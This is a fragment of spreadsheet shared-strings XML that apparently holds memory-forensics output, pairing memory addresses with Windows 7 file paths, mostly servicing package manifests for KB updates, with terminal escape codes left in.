    <t>\Windows\servicing\Packages\Package_299_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde969300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_356_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde969630</t>
  </si>
  <si>
    <t>\Windows\System32\ulib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9696e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_355_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde969a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_83_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde969ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_354_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde969f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_353_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96a2a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_85_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96a360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_360_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96a748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_359_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96ab30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_358_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96ae60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_84_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96af18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_357_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96b298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-BlueIP-Package-TopLevel~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>~~7.2.7601.16</t>
  </si>
  <si>
    <t>415.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96b680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-WinIP-Package-MiniLP~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>-US~7.1.7601.</t>
  </si>
  <si>
    <t>16398.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde96ba68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-WinIP-Package-TopLevel~31bf3856ad364e35~x86~</t>
  </si>
  <si>
    <t>~7.1.7601.163</t>
  </si>
  <si>
    <t>98.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96bf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_361_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96c100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_301_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96c550</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDC-Package~31bf3856ad364e35~x86~~6.1.7601.17514</t>
  </si>
  <si>
    <t>0xde96c918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96c9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96cd00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB982018~31bf3856ad364e35~x86~~6.1.3.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96cdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RDP-BlueIP-Package-MiniLP~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>n-US~7.2.7601</t>
  </si>
  <si>
    <t>.16415.mum_x001B_</t>
  </si>
  <si>
    <t>0xde96d038</t>
  </si>
  <si>
    <t>0xde96d420</t>
  </si>
  <si>
    <t>6.1.7601.17</t>
  </si>
  <si>
    <t>0xde96d808</t>
  </si>
  <si>
    <t>601.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96dc00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_147_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96dcb8</t>
  </si>
  <si>
    <t>~~6.1.7601.</t>
  </si>
  <si>
    <t>0xde96e038</t>
  </si>
  <si>
    <t>0xde96e3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2882822~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96e480</t>
  </si>
  <si>
    <t>0xde96e868</t>
  </si>
  <si>
    <t>6~~6.1.7601.1</t>
  </si>
  <si>
    <t>0xde96ec50</t>
  </si>
  <si>
    <t>0xde96ef80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2731771~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96f038</t>
  </si>
  <si>
    <t>0xde96f300</t>
  </si>
  <si>
    <t>0xde96f3b8</t>
  </si>
  <si>
    <t>0xde96f6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2937610~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde96f7a0</t>
  </si>
  <si>
    <t>0xde96fc50</t>
  </si>
  <si>
    <t>0xde9703c8</t>
  </si>
  <si>
    <t>0xde9706f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_342_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9707b0</t>
  </si>
  <si>
    <t>.0.7601.17514</t>
  </si>
  <si>
    <t>0xde970b98</t>
  </si>
  <si>
    <t>0xde970e88</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde970f80</t>
  </si>
  <si>
    <t>0xde971300</t>
  </si>
  <si>
    <t>0xde971630</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\miguiresource.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9716e8</t>
  </si>
  <si>
    <t>0xde971ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_343_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde971b98</t>
  </si>
  <si>
    <t>0xde971f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Killbits-Package~31bf3856ad364e35~x86~~8.0.7601.</t>
  </si>
  <si>
    <t>0xde9722a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_345_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde972360</t>
  </si>
  <si>
    <t>0xde972748</t>
  </si>
  <si>
    <t>0xde972b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ICM-Package~31bf3856ad364e35~x86~~6.1.7601.17514</t>
  </si>
  <si>
    <t>0xde972e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_344_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde972f18</t>
  </si>
  <si>
    <t>0xde9731e0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder</t>
  </si>
  <si>
    <t>.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde973298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~~6.1.7601.17</t>
  </si>
  <si>
    <t>0xde9735c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_346_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde973680</t>
  </si>
  <si>
    <t>0xde973b30</t>
  </si>
  <si>
    <t>601.17</t>
  </si>
  <si>
    <t>0xde973f18</t>
  </si>
  <si>
    <t>0xde974298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WLMS-Package~31bf3856ad364e35~x86~~6.1.7601.1751</t>
  </si>
  <si>
    <t>0xde9745c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_347_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde974680</t>
  </si>
  <si>
    <t>0xde974a68</t>
  </si>
  <si>
    <t>0xde974e50</t>
  </si>
  <si>
    <t>0xde9751d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2621440_RTM~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9754c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Network Shortcuts_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9755b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2621440~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9759b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_348_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde975a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2656356~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde975e50</t>
  </si>
  <si>
    <t>0xde976300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_36_for_KB2732059~31bf3856ad364e35~x86~~6.1.5.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9766e8</t>
  </si>
  <si>
    <t>0xde976ad0</t>
  </si>
  <si>
    <t>0xde976e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_349_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde976eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2621440~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde977038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_350_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde977298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2729452~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9775c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_684_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde977680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_26_for_KB2763523~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde977b30</t>
  </si>
  <si>
    <t>0xde977f18</t>
  </si>
  <si>
    <t>0xde978298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2786081~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde978680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2786081_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde978a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2786081~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde978d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde978e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2742599~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9791d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9795b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2813430~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde979a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2820331~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde979d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB3184143~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde979e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2789645~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97a200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2852386~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97a5e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_82_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97a9d0</t>
  </si>
  <si>
    <t>0xde97ad00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_163_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97adb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_28_for_KB2574819~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97b520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2888049~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97b9d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2834140~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97bd00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_164_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97bdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2864202~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97c038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2808679~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97c480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB2893519~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97c868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2862152~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97cb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161958~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97cc50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB2808679~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB2893519~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97d300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3161958~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97d3b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2891804~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97d868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2892074~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97db98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmwhql0.inf_x86_neutral_df7fb046fec7c967\mdmwhql</t>
  </si>
  <si>
    <t>0xde97dc50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2893294~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97df80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3161958_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97e1e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_415_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97e540</t>
  </si>
  <si>
    <t>\Windows\System32\midimap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97e690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_414_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97e748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2911501~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97eb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2891804~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97ef18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2891804_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97f1e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3177467~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97f298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2857650~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97f680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2836943~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97fa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2911501~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97fd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3179573~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde97fe50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2911501_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9801d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9805b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2919469~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9808e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3156019~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9809a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_37_for_KB2843630~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde980d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2843630~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde981300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_83_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9816e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_82_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde981ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde981e00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3140245~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde981eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_29_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde982038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde982298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K_x001B_[1G</t>
  </si>
  <si>
    <t>0xde9825c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde982680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_24_for_KB2966583~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde982a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2973201~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde982e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2931356~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde983298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2506212~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9835c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3161949~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde983680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2506212~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde983a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_82_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde983e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_81_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9841d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2510531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde984500</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wmiprov.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9845b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2510531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9848e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9849a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2509553~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde984d88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2509553~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde985200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2560656_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9855e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2560656~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde985918</t>
  </si>
  <si>
    <t>\Windows\inf\WmiApRpl\WmiApRpl.h_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9859d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2552343~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde985d00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde985db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2552343~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde986078</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\mofd.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde986520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2560656~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde986908</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2560656_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde986c38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde986cf0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2560656~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde987038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2564958~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9873c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3156016~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde987480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2585542~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde987868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2585542~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde987c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2564958~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde987f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_53_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde988038</t>
